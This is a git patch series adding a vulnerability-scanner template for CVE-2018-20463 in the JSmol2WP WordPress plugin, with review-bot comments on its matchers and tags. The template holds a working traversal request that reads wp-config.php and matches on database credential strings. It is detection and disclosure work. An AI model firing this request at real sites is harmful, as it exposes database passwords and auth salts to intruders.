From d740257f5d28ec5e488fc12d4c895ea5bd0a289b Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 19 Aug 2022 19:09:06 +0530
Subject: [PATCH 1/3] Create CVE-2018-20463.yaml
---
cves/2018/CVE-2018-20463.yaml | 41 +++++++++++++++++++++++++++++++++++
1 file changed, 41 insertions(+)
create mode 100644 cves/2018/CVE-2018-20463.yaml
diff --git a/cves/2018/CVE-2018-20463.yaml b/cves/2018/CVE-2018-20463.yaml
new file mode 100644
index 0000000000..dcc13aa4ad
--- /dev/null
+++ b/cves/2018/CVE-2018-20463.yaml
@@ -0,0 +1,41 @@
+id: CVE-2018-20463
+
+info:
+ name: JSmol2WP <= 1.07 - Directory Traversal
+ author: vinit989
+ severity: high
+ description: |
+ An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. There is an arbitrary file read vulnerability via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. This can also be used for SSRF.
+ reference:
+ - https://wpscan.com/vulnerability/9197
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-20463
+ classification:
+ cve-id: CVE-2018-20463
+ metadata:
+ verified: true
+ tags: cve,cve2018,ssrf,traversal
+
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "AUTH_KEY"
+ - "NONCE_SALT"
+ - "DB_PASSWORD"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/plain
+
+ - type: status
+ status:
+ - 200
From 6532792b926960be8bcf2d91400ebf1b095f11ab Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 19 Aug 2022 19:12:39 +0530
Subject: [PATCH 2/3] Update CVE-2018-20463.yaml
---
cves/2018/CVE-2018-20463.yaml | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
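Review bot: Nothing in the template records that a positive match means the response body is the target's own wp-config.php, so database credentials and auth salts land in any output mode that prints or stores bodies, which is not obvious from the request line alone. A one-line comment above `requests:` would make the handling requirement explicit, e.g. `# NOTE: a match returns the site's wp-config.php; captured response bodies contain DB credentials and salts and must be handled as secrets.`. The three-word body match combined with `matchers-condition: and`, the `text/plain` header check and status 200 otherwise reads as a deliberate, low-false-positive signature.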
diff --git a/cves/2018/CVE-2018-20463.yaml b/cves/2018/CVE-2018-20463.yaml
index dcc13aa4ad..e500c7d61d 100644
--- a/cves/2018/CVE-2018-20463.yaml
+++ b/cves/2018/CVE-2018-20463.yaml
@@ -13,8 +13,7 @@ info:
 cve-id: CVE-2018-20463
 metadata:
 verified: true
- tags: cve,cve2018,ssrf,traversal
-
+ tags: cve,cve2018,ssrf,traversal,wp,wp-plugin,wordpress
 requests:
 - method: GET
From bd419534de4a4c2508d855303fa25641dd708249 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sun, 21 Aug 2022 14:03:27 +0530
Subject: [PATCH 3/3] Update CVE-2018-20463.yaml
---
cves/2018/CVE-2018-20463.yaml | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/cves/2018/CVE-2018-20463.yaml b/cves/2018/CVE-2018-20463.yaml
index e500c7d61d..dae6b668ca 100644
--- a/cves/2018/CVE-2018-20463.yaml
+++ b/cves/2018/CVE-2018-20463.yaml
@@ -8,12 +8,13 @@ info:
 An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. There is an arbitrary file read vulnerability via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. This can also be used for SSRF.
 reference:
 - https://wpscan.com/vulnerability/9197
+ - https://wordpress.org/plugins/jsmol2wp/
 - https://nvd.nist.gov/vuln/detail/CVE-2018-20463
 classification:
 cve-id: CVE-2018-20463
 metadata:
 verified: true
- tags: cve,cve2018,ssrf,traversal,wp,wp-plugin,wordpress
+ tags: cve,cve2018,traversal,wp,wp-plugin,wordpress,jsmol2wp
 requests:
 - method: GET
@@ -25,9 +26,8 @@ requests:
 - type: word
 part: body
 words:
- - "AUTH_KEY"
- - "NONCE_SALT"
- - "DB_PASSWORD"
+ - "'DB_USER',"
+ - "'DB_PASSWORD'"
 condition: and
 - type: word
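Review bot: The `ssrf` tag is removed in the new `tags:` line, but the description at the top of this hunk still ends with `This can also be used for SSRF.`, so the info block now advertises a behaviour the template does not check. Either trim that sentence or qualify it, e.g. `This can also be used for SSRF; this template only exercises the local file read.`, so that tags and description describe the same thing. The `info:` block begins above the hunk; only its tail is visible here.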
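Review bot: The new body words `'DB_USER',` and `'DB_PASSWORD'` hard-code single quotes around the define() names, so a wp-config.php written with double quotes (`define("DB_PASSWORD", ...)` is equally valid PHP and does occur in hand-edited configs) no longer satisfies `condition: and`, a false negative the earlier bare `DB_PASSWORD` did not have. Presumably the rewrite is meant to stop depending on the salts being present while still anchoring on the define form; a regex matcher keeps that intent without the quoting assumption: `- type: regex`, `part: body`, `regex: ["define\\(\\s*['\"]DB_USER['\"]", "define\\(\\s*['\"]DB_PASSWORD['\"]"]` with `condition: and` unchanged. The matchers list continues past the hunk with the header and status matchers.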